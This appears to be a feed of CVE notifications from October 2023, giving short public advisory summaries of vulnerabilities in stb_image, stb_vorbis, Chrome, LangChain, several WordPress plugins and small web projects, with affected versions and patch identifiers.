🚨 CVE-2023-45667stb_image is a single file MIT licensed library for processing images.If `stbi__load_gif_main` in `stbi_load_gif_from_memory` fails it returns a null pointer and may keep the `z` variable uninitialized. In case the caller also sets the flip vertically flag, it continues and calls `stbi__vertical_flip_slices` with the null pointer result value and the uninitialized `z` value. This may result in a program crash.🎖@cveNotify |
|
| 2023-10-21 06:22:53 |
🚨 CVE-2023-45675stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger out of bounds write in `f->vendor[len] = (char)'\0';`. The root cause is that if the len read in `start_decoder` is `-1` and `len + 1` becomes 0 when passed to `setup_malloc`. The `setup_malloc` behaves differently when `f->alloc.alloc_buffer` is pre-allocated. Instead of returning `NULL` as in `malloc` case it shifts the pre-allocated buffer by zero and returns the currently available memory block. This issue may lead to code execution.🎖@cveNotify |
|
| 2023-10-21 06:22:52 |
🚨 CVE-2023-45676stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger out of bounds write in `f->vendor[i] = get8_packet(f);`. The root cause is an integer overflow in `setup_malloc`. A sufficiently large value in the variable `sz` overflows with `sz+7` in and the negative value passes the maximum available memory buffer check. This issue may lead to code execution.🎖@cveNotify |
|
| 2023-10-21 06:22:51 |
🚨 CVE-2023-45677stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger out of bounds write in `f->vendor[len] = (char)'\0';`. The root cause is that if `len` read in `start_decoder` is a negative number and `setup_malloc` successfully allocates memory in that case, but memory write is done with a negative index `len`. Similarly if len is INT_MAX the integer overflow len+1 happens in `f->vendor = (char*)setup_malloc(f, sizeof(char) * (len+1));` and `f->comment_list[i] = (char*)setup_malloc(f, sizeof(char) * (len+1));`. This issue may lead to code execution.🎖@cveNotify |
|
| 2023-10-21 06:22:50 |
🚨 CVE-2023-45678stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger out of buffer write in `start_decoder` because at maximum `m->submaps` can be 16 but `submap_floor` and `submap_residue` are declared as arrays of 15 elements. This issue may lead to code execution.🎖@cveNotify |
|
| 2023-10-21 06:22:49 |
🚨 CVE-2023-45679stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger memory allocation failure in `start_decoder`. In that case the function returns early, but some of the pointers in `f->comment_list` are left initialized and later `setup_free` is called on these pointers in `vorbis_deinit`. This issue may lead to code execution.🎖@cveNotify |
|
| 2023-10-21 06:22:48 |
🚨 CVE-2023-45680stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger memory allocation failure in `start_decoder`. In that case the function returns early, the `f->comment_list` is set to `NULL`, but `f->comment_list_length` is not reset. Later in `vorbis_deinit` it tries to dereference the `NULL` pointer. This issue may lead to denial of service.🎖@cveNotify |
|
| 2023-10-21 06:22:47 |
🚨 CVE-2023-45681stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger memory write past an allocated heap buffer in `start_decoder`. The root cause is a potential integer overflow in `sizeof(char*) * (f->comment_list_length)` which may make `setup_malloc` allocate less memory than required. Since there is another integer overflow an attacker may overflow it too to force `setup_malloc` to return 0 and make the exploit more reliable. This issue may lead to code execution.🎖@cveNotify |
|
| 2023-10-21 06:22:46 |
🚨 CVE-2023-45682stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger out of bounds read in `DECODE` macro when `var` is negative. As it can be seen in the definition of `DECODE_RAW` a negative `var` is a valid value. This issue may be used to leak internal memory allocation information.🎖@cveNotify |
|
| 2023-10-21 00:22:26 |
🚨 CVE-2023-43346Cross-site scripting (XSS) vulnerability in opensolution Quick CMS v.6.7 allows a local attacker to execute arbitrary code via a crafted script to the Backend - Dashboard parameter in the Languages Menu component.🎖@cveNotify |
|
| 2023-10-21 00:22:24 |
🚨 CVE-2023-1004A vulnerability has been found in MarkText up to 0.17.1 on Windows and classified as critical. Affected by this vulnerability is an unknown functionality of the component WSH JScript Handler. The manipulation leads to code injection. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-221737 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-21 00:22:23 |
🚨 CVE-2023-32785In Langchain through 0.0.155, prompt injection allows execution of arbitrary code against the SQL service provided by the chain.🎖@cveNotify |
|
| 2023-10-21 00:22:22 |
🚨 CVE-2023-32786In Langchain through 0.0.155, prompt injection allows an attacker to force the service to retrieve data from an arbitrary URL, essentially providing SSRF and potentially injecting content into downstream tasks.🎖@cveNotify |
|
| 2023-10-21 00:22:21 |
🚨 CVE-2023-38191An issue was discovered in SuperWebMailer 9.00.0.01710. It allows spamtest_external.php XSS via a crafted filename.🎖@cveNotify |
|
| 2023-10-21 00:22:20 |
🚨 CVE-2023-43353Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the extra parameter in the news menu component.🎖@cveNotify |
|
| 2023-10-21 00:22:19 |
🚨 CVE-2023-43354Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Profiles parameter in the Extensions -MicroTiny WYSIWYG editor component.🎖@cveNotify |
|
| 2023-10-21 00:22:18 |
🚨 CVE-2023-43355Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the password and password again parameters in the My Preferences - Add user component.🎖@cveNotify |
|
| 2023-10-21 00:22:17 |
🚨 CVE-2023-43356Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Global Meatadata parameter in the Global Settings Menu component.🎖@cveNotify |
|
| 2023-10-21 00:22:16 |
🚨 CVE-2023-43357Cross Site Scripting vulnerability in CMSmadesimple v.2.2.18 allows a local attacker to execute arbitrary code via a crafted script to the Title parameter in the Manage Shortcuts component.🎖@cveNotify |
|
| 2023-10-21 00:22:15 |
🚨 CVE-2023-1003A vulnerability, which was classified as critical, was found in Typora up to 1.5.5 on Windows. Affected is an unknown function of the component WSH JScript Handler. The manipulation leads to code injection. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. Upgrading to version 1.5.8 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-221736.🎖@cveNotify |
|
| 2023-10-21 00:22:11 |
🚨 CVE-2023-0964A vulnerability classified as critical has been found in SourceCodester Sales Tracker Management System 1.0. Affected is an unknown function of the file admin/products/view_product.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. VDB-221634 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-21 00:22:10 |
🚨 CVE-2023-0903A vulnerability was found in SourceCodester Employee Task Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file edit-task.php. The manipulation of the argument task_id leads to sql injection. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221452.🎖@cveNotify |
|
| 2023-10-21 00:22:09 |
🚨 CVE-2023-0887A vulnerability was found in phjounin TFTPD64-SE 4.64 and classified as critical. This issue affects some unknown processing of the file tftpd64_svc.exe. The manipulation leads to unquoted search path. An attack has to be approached locally. The complexity of an attack is rather high. The exploitation is known to be difficult. The associated identifier of this vulnerability is VDB-221351.🎖@cveNotify |
|
| 2023-10-21 00:22:08 |
🚨 CVE-2023-0785A vulnerability classified as problematic was found in SourceCodester Best Online News Portal 1.0. Affected by this vulnerability is an unknown functionality of the file check_availability.php. The manipulation of the argument username leads to exposure of sensitive information through data queries. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-220645 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-20 23:24:12 |
🚨 CVE-2023-2464Inappropriate implementation in PictureInPicture in Google Chrome prior to 113.0.5672.63 allowed an attacker who convinced a user to install a malicious extension to perform an origin spoof in the security UI via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-10-20 23:24:10 |
🚨 CVE-2023-2466Inappropriate implementation in Prompts in Google Chrome prior to 113.0.5672.63 allowed a remote attacker to spoof the contents of the security UI via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-10-20 23:24:09 |
🚨 CVE-2023-2467Inappropriate implementation in Prompts in Google Chrome on Android prior to 113.0.5672.63 allowed a remote attacker to bypass permissions restrictions via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-10-20 23:24:08 |
🚨 CVE-2023-2468Inappropriate implementation in PictureInPicture in Google Chrome prior to 113.0.5672.63 allowed a remote attacker who had compromised the renderer process to obfuscate the security UI via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-10-20 23:24:07 |
🚨 CVE-2023-2463Inappropriate implementation in Full Screen Mode in Google Chrome on Android prior to 113.0.5672.63 allowed a remote attacker to hide the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-10-20 23:24:06 |
🚨 CVE-2023-2461Use after free in OS Inputs in Google Chrome on ChromeOS prior to 113.0.5672.63 allowed a remote attacker who convinced a user to enage in specific UI interaction to potentially exploit heap corruption via crafted UI interaction. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-10-20 23:24:05 |
🚨 CVE-2023-1819Out of bounds read in Accessibility in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-10-20 23:24:04 |
🚨 CVE-2023-1820Heap buffer overflow in Browser History in Google Chrome prior to 112.0.5615.49 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-10-20 23:24:02 |
🚨 CVE-2023-1821Inappropriate implementation in WebShare in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to potentially hide the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-10-20 23:24:01 |
🚨 CVE-2023-1822Incorrect security UI in Navigation in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to perform domain spoofing via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-10-20 23:24:00 |
🚨 CVE-2023-1823Inappropriate implementation in FedCM in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-10-20 15:22:18 |
🚨 CVE-2018-25080A vulnerability, which was classified as problematic, has been found in MobileDetect 2.8.31. This issue affects the function initLayoutType of the file examples/session_example.php of the component Example. The manipulation of the argument $_SERVER['PHP_SELF'] leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.8.32 is able to address this issue. The identifier of the patch is 31818a441b095bdc4838602dbb17b8377d1e5cce. It is recommended to upgrade the affected component. The identifier VDB-220061 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-20 15:22:16 |
🚨 CVE-2019-25101A vulnerability classified as critical has been found in OnShift TurboGears 1.0.11.10. This affects an unknown part of the file turbogears/controllers.py of the component HTTP Header Handler. The manipulation leads to http response splitting. It is possible to initiate the attack remotely. Upgrading to version 1.0.11.11 is able to address this issue. The patch is named f68bbaba47f4474e1da553aa51564a73e1d92a84. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220059.🎖@cveNotify |
|
| 2023-10-20 15:22:15 |
🚨 CVE-2018-25079A vulnerability was found in Segmentio is-url up to 1.2.2. It has been rated as problematic. Affected by this issue is some unknown functionality of the file index.js. The manipulation leads to inefficient regular expression complexity. The attack may be launched remotely. Upgrading to version 1.2.3 is able to address this issue. The patch is identified as 149550935c63a98c11f27f694a7c4a9479e53794. It is recommended to upgrade the affected component. VDB-220058 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-20 15:22:14 |
🚨 CVE-2018-25076A vulnerability classified as critical was found in Events Extension on BigTree. Affected by this vulnerability is the function getRandomFeaturedEventByDate/getUpcomingFeaturedEventsInCategoriesWithSubcategories/recacheEvent/searchResults of the file classes/events.php. The manipulation leads to sql injection. The patch is named 11169e48ab1249109485fdb1e0c9fca3d25ba01d. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218395.🎖@cveNotify |
|
| 2023-10-20 15:22:12 |
🚨 CVE-2018-25075A vulnerability classified as critical has been found in karsany OBridge up to 1.3. Affected is the function getAllStandaloneProcedureAndFunction of the file obridge-main/src/main/java/org/obridge/dao/ProcedureDao.java. The manipulation leads to sql injection. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 1.4 is able to address this issue. The name of the patch is 52eca4ad05f3c292aed3178b2f58977686ffa376. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218376.🎖@cveNotify |
|
| 2023-10-20 15:22:11 |
🚨 CVE-2018-25074A vulnerability was found in Prestaul skeemas and classified as problematic. This issue affects some unknown processing of the file validators/base.js. The manipulation of the argument uri leads to inefficient regular expression complexity. The patch is named 65e94eda62dc8dc148ab3e59aa2ccc086ac448fd. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218003.🎖@cveNotify |
|
| 2023-10-20 15:22:10 |
🚨 CVE-2018-25073A vulnerability has been found in Newcomer1989 TSN-Ranksystem up to 1.2.6 and classified as problematic. This vulnerability affects the function getlog of the file webinterface/bot.php. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.2.7 is able to address this issue. The patch is identified as b3a3cd8efe2cd3bd3c5b3b7abf2fe80dbee51b77. It is recommended to upgrade the affected component. VDB-218002 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-20 15:22:08 |
🚨 CVE-2018-25072A vulnerability classified as critical has been found in lojban jbovlaste. This affects an unknown part of the file dict/listing.html. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The patch is named 6ff44c2e87b1113eb07d76ea62e1f64193b04d15. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-217647.🎖@cveNotify |
|
| 2023-10-20 15:22:07 |
🚨 CVE-2019-25100A vulnerability was found in happyman twmap. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file twmap3/data/ajaxCRUD/pointdata2.php. The manipulation of the argument id leads to sql injection. Upgrading to version v2.9_v4.31 is able to address this issue. The identifier of the patch is babbec79b3fa4efb3bd581ea68af0528d11bba0c. It is recommended to upgrade the affected component. The identifier VDB-217645 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-20 15:22:06 |
🚨 CVE-2018-25070A vulnerability has been found in polterguy Phosphorus Five up to 8.2 and classified as critical. This vulnerability affects the function csv.Read of the file plugins/extras/p5.mysql/NonQuery.cs of the component CSV Import. The manipulation leads to sql injection. Upgrading to version 8.3 is able to address this issue. The patch is identified as c179a3d0703db55cfe0cb939b89593f2e7a87246. It is recommended to upgrade the affected component. VDB-217606 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-20 15:22:05 |
🚨 CVE-2018-25071A vulnerability was found in roxlukas LMeve up to 0.1.58. It has been rated as critical. Affected by this issue is the function insert_log of the file wwwroot/ccpwgl/proxy.php. The manipulation of the argument fetch leads to sql injection. Upgrading to version 0.1.59-beta is able to address this issue. The patch is identified as c25ff7fe83a2cda1fcb365b182365adc3ffae332. It is recommended to upgrade the affected component. VDB-217610 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-20 15:22:04 |
🚨 CVE-2018-25067A vulnerability, which was classified as critical, was found in JoomGallery up to 3.3.3. This affects an unknown part of the file administrator/components/com_joomgallery/views/config/tmpl/default.php of the component Image Sort Handler. The manipulation leads to sql injection. Upgrading to version 3.3.4 is able to address this issue. The identifier of the patch is dc414ee954e849082260f8613e15a1c1e1d354a1. It is recommended to upgrade the affected component. The identifier VDB-217569 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-20 15:22:03 |
🚨 CVE-2018-25068A vulnerability has been found in devent globalpom-utils up to 4.5.0 and classified as critical. This vulnerability affects the function createTmpDir of the file globalpomutils-fileresources/src/main/java/com/anrisoftware/globalpom/fileresourcemanager/FileResourceManagerProvider.java. The manipulation leads to insecure temporary file. The attack can be initiated remotely. Upgrading to version 4.5.1 is able to address this issue. The patch is identified as 77a820bac2f68e662ce261ecb050c643bd7ee560. It is recommended to upgrade the affected component. VDB-217570 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-20 13:22:24 |
🚨 CVE-2020-36751The Coupon Creator plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.1. This is due to missing or incorrect nonce validation on the save_meta() function. This makes it possible for unauthenticated attackers to save meta fields via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-10-20 13:22:23 |
🚨 CVE-2020-36753The Hueman theme for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.6.3. This is due to missing or incorrect nonce validation on the save_meta_box() function. This makes it possible for unauthenticated attackers to save metabox data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-10-20 13:22:22 |
🚨 CVE-2020-36754The Paid Memberships Pro plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.4.2. This is due to missing or incorrect nonce validation on the pmpro_page_save() function. This makes it possible for unauthenticated attackers to save pages via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-10-20 13:22:20 |
🚨 CVE-2020-36755The Customizr theme for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.3.0. This is due to missing or incorrect nonce validation on the czr_fn_post_fields_save() function. This makes it possible for unauthenticated attackers to post fields via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-10-20 13:22:19 |
🚨 CVE-2020-36758The RSS Aggregator by Feedzy plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.4.2. This is due to missing or incorrect nonce validation on the save_feedzy_post_type_meta() function. This makes it possible for unauthenticated attackers to update post meta via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-10-20 13:22:18 |
🚨 CVE-2020-36759The Woody code snippets plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.3.9. This is due to missing or incorrect nonce validation on the runActions() function. This makes it possible for unauthenticated attackers to activate and deactivate snippets via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-10-20 13:22:16 |
🚨 CVE-2021-4334The Fancy Product Designer plugin for WordPress is vulnerable to unauthorized modification of site options due to a missing capability check on the fpd_update_options function in versions up to, and including, 4.6.9. This makes it possible for authenticated attackers with subscriber-level permissions to modify site options, including setting the default role to administrator which can allow privilege escalation.🎖@cveNotify |
|
| 2023-10-20 13:22:15 |
🚨 CVE-2021-4418The Custom CSS, JS & PHP plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.0.7. This is due to missing or incorrect nonce validation on the save() function. This makes it possible for unauthenticated attackers to save code snippets via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-10-20 13:22:13 |
🚨 CVE-2022-2441The ImageMagick Engine plugin for WordPress is vulnerable to remote code execution via the 'cli_path' parameter in versions up to, and including 1.7.5. This makes it possible for unauthenticated users to run arbitrary commands leading to remote command execution, granted they can trick a site administrator into performing an action such as clicking on a link. This makes it possible for an attacker to create and or modify files hosted on the server which can easily grant attackers backdoor access to the affected server.🎖@cveNotify |
|
| 2023-10-20 13:22:11 |
🚨 CVE-2022-3342The Jetpack CRM plugin for WordPress is vulnerable to PHAR deserialization via the ‘zbscrmcsvimpf’ parameter in the 'zeroBSCRM_CSVImporterLitehtml_app' function in versions up to, and including, 5.3.1. While the function performs a nonce check, steps 2 and 3 of the check do not take any action upon a failed check. These steps then perform a 'file_exists' check on the value of 'zbscrmcsvimpf'. If a phar:// archive is supplied, its contents will be deserialized and an object injected in the execution stream. This allows an unauthenticated attacker to obtain object injection if they are able to upload a phar archive (for instance if the site supports image uploads) and then trick an administrator into performing an action, such as clicking a link.🎖@cveNotify |
|
| 2023-10-20 13:22:10 |
🚨 CVE-2022-3622The Blog2Social plugin for WordPress is vulnerable to authorization bypass due to missing capability checks in versions up to, and including, 6.9.11. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to change some plugin settings intended to be modifiable by admins only.🎖@cveNotify |
|
| 2023-10-20 13:22:08 |
🚨 CVE-2022-4290The Cyr to Lat plugin for WordPress is vulnerable to authenticated SQL Injection via the 'ctl_sanitize_title' function in versions up to, and including, 3.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This potentially allows authenticated users with the ability to add or modify terms or tags to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. A partial patch became available in version 3.6 and the issue was fully patched in version 3.7.🎖@cveNotify |
|
| 2023-10-20 13:22:07 |
🚨 CVE-2022-4943The miniOrange's Google Authenticator plugin for WordPress is vulnerable to authorization bypass due to a missing capability check when changing plugin settings in versions up to, and including, 5.6.5. This makes it possible for unauthenticated attackers to change the plugin's settings.🎖@cveNotify |
|
| 2023-10-20 13:22:06 |
🚨 CVE-2023-3869The wpDiscuz plugin for WordPress is vulnerable to unauthorized modification of data due to a missing authorization check on the voteOnComment function in versions up to, and including, 7.6.3. This makes it possible for unauthenticated attackers to increase or decrease the rating of a comment.🎖@cveNotify |
|
| 2023-10-20 13:22:04 |
🚨 CVE-2023-3996The ARMember Lite - Membership Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 4.0.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2023-10-20 13:22:03 |
🚨 CVE-2023-3998The wpDiscuz plugin for WordPress is vulnerable to unauthorized modification of data due to a missing authorization check on the userRate function in versions up to, and including, 7.6.3. This makes it possible for unauthenticated attackers to increase or decrease the rating of a post.🎖@cveNotify |
|
| 2023-10-20 13:22:01 |
🚨 CVE-2023-4021The Modern Events Calendar lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Google API key and Calendar ID in versions up to, but not including, 7.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2023-10-20 13:22:00 |
🚨 CVE-2023-4386The Essential Blocks plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 4.2.0 via deserialization of untrusted input in the get_posts function. This allows unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2023-10-20 13:21:58 |
🚨 CVE-2023-4648The WP Customer Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 3.6.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2023-10-20 13:21:57 |
🚨 CVE-2023-4668The Ad Inserter for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 2.7.30 via the ai-debug-processing-fe URL parameter. This can allow unauthenticated attackers to extract sensitive data including installed plugins (present and active), active theme, various plugin settings, WordPress version, as well as some server settings such as memory limit, installation paths.🎖@cveNotify |
|
| 2023-10-20 10:52:23 |
🚨 CVE-2015-10075A vulnerability was found in Custom-Content-Width 1.0. It has been declared as problematic. Affected by this vulnerability is the function override_content_width/register_settings of the file custom-content-width.php. The manipulation leads to cross site scripting. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 1.0.1 is able to address this issue. The patch is named e05e0104fc42ad13b57e2b2cb2d1857432624d39. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220219. NOTE: This attack is not very likely.🎖@cveNotify |
|
| 2023-10-20 10:52:21 |
🚨 CVE-2015-10074A vulnerability was found in OpenSeaMap online_chart 1.2. It has been classified as problematic. Affected is the function init of the file index.php. The manipulation of the argument mtext leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version staging is able to address this issue. The patch is identified as 8649157158f921590d650e2d2f4bdf0df1017e9d. It is recommended to upgrade the affected component. VDB-220218 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-20 10:52:20 |
🚨 CVE-2015-10073A vulnerability, which was classified as problematic, was found in tinymighty WikiSEO 1.2.1 on MediaWiki. This affects the function modifyHTML of the file WikiSEO.body.php of the component Meta Property Tag Handler. The manipulation of the argument content leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.2.2 is able to address this issue. The patch is named 089a5797be612b18a820f9f1e6593ad9a91b1dba. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220215.🎖@cveNotify |
|
| 2023-10-20 10:52:18 |
🚨 CVE-2015-10070A vulnerability was found in copperwall Twiddit. It has been rated as critical. This issue affects some unknown processing of the file index.php. The manipulation leads to sql injection. The identifier of the patch is 2203d4ce9810bdaccece5c48ff4888658a01acfc. It is recommended to apply a patch to fix this issue. The identifier VDB-218897 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-20 10:52:17 |
🚨 CVE-2015-10071A vulnerability was found in gitter-badger ezpublish-modern-legacy. It has been rated as problematic. This issue affects some unknown processing of the file kernel/user/forgotpassword.php. The manipulation leads to weak password recovery. The complexity of an attack is rather high. The exploitation is known to be difficult. Upgrading to version 1.0 is able to address this issue. The patch is named 5908d5ee65fec61ce0e321d586530461a210bf2a. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-218951.🎖@cveNotify |
|
| 2023-10-20 10:52:16 |
🚨 CVE-2015-10067A vulnerability was found in oznetmaster SSharpSmartThreadPool. It has been classified as problematic. This affects an unknown part of the file SSharpSmartThreadPool/SmartThreadPool.cs. The manipulation leads to race condition within a thread. The complexity of an attack is rather high. The exploitability is told to be difficult. The patch is named 0e58073c831093aad75e077962e9fb55cad0dc5f. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218463.🎖@cveNotify |
|
| 2023-10-20 10:52:14 |
🚨 CVE-2015-10065A vulnerability classified as critical was found in AenBleidd FiND. This vulnerability affects the function init_result of the file validator/my_validator.cpp. The manipulation leads to buffer overflow. The patch is identified as ee2eef34a83644f286c9adcaf30437f92e9c48f1. It is recommended to apply a patch to fix this issue. VDB-218458 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-20 10:52:13 |
🚨 CVE-2015-10066A vulnerability was found in tynx wuersch and classified as critical. Affected by this issue is the function packValue/getByCustomQuery of the file backend/base/Store.class.php. The manipulation leads to sql injection. The patch is identified as 66d4718750a741d1053d327a79e285fd50372519. It is recommended to apply a patch to fix this issue. VDB-218462 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-20 10:52:12 |
🚨 CVE-2015-10064A vulnerability was found in VictorFerraresi pokemon-database-php. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to sql injection. The patch is named dd0e1e6cdf648d6a3deff441f515bcb1d7573d68. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218455.🎖@cveNotify |
|
| 2023-10-20 10:52:10 |
🚨 CVE-2015-10062A vulnerability, which was classified as problematic, was found in galaxy-data-resource up to 14.10.0. This affects an unknown part of the component Command Line Template. The manipulation leads to injection. Upgrading to version 14.10.1 is able to address this issue. The patch is named 50d65f45d3f5be5d1fbff2e45ac5cec075f07d42. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-218451.🎖@cveNotify |
|
| 2023-10-20 10:52:09 |
🚨 CVE-2015-10063A vulnerability was found in saemorris TheRadSystem and classified as critical. This issue affects the function redirect of the file _login.php. The manipulation of the argument user/pass leads to sql injection. The attack may be initiated remotely. The identifier of the patch is bfba26bd34af31648a11af35a0bb66f1948752a6. It is recommended to apply a patch to fix this issue. The identifier VDB-218453 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-20 10:52:07 |
🚨 CVE-2015-10061A vulnerability was found in evandro-machado Trabalho-Web2. It has been classified as critical. This affects an unknown part of the file src/java/br/com/magazine/dao/ClienteDAO.java. The manipulation leads to sql injection. The patch is named f59ac954625d0a4f6d34f069a2e26686a7a20aeb. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218427.🎖@cveNotify |
|
| 2023-10-20 10:52:06 |
🚨 CVE-2015-10058A vulnerability, which was classified as problematic, was found in Wikisource Category Browser. This affects an unknown part of the file index.php. The manipulation of the argument lang leads to cross site scripting. It is possible to initiate the attack remotely. The patch is named 764f4e8ce3f9242637df77530c70ae8a2ec4b6a1. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218415.🎖@cveNotify |
|
| 2023-10-20 10:52:05 |
